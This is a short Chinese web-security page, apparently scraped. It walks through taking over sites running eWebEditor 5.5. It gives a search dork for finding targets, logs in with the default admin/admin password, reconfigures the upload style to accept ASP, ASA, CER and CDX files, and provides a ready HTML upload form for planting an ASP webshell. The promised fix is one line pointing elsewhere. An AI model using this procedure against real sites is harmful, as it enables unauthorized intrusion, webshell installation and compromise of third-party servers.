好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

某建筑装饰公司0day及修复 - 网站安全 - 自学php

作者:脚本小子

Google搜索:inurl:xxhs.asp?classid=

漏洞eWebEditor5.5

拿webshell方法

直接进后台eWebEditor/admin/login.asp

默认账号密码 admin admin

登陆后台点击[样式管理]

在popup样式管理

修改

路径模式:选择绝对路径 图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx

图片类型比如就是我们要上传的ASP木马格式

上传路径:/

图片限制:写上1000 免的上不了我们的asp木马 上传内容不要写

然后我们就可以提交了 就可以看到样式增加成功!

然后把

下面的代码保存为scriptkiddies.html

<form action=" HdhCmsTest2cto测试数据 /eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=scriptkiddies.asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=upload> </form>

然后上传我们刚才的asp或ASA格式木马

你懂的.   修复:又是编辑器 漏洞 ,参考本站以前文章

查看更多关于某建筑装饰公司0day及修复 - 网站安全 - 自学php的详细内容...

  阅读:66次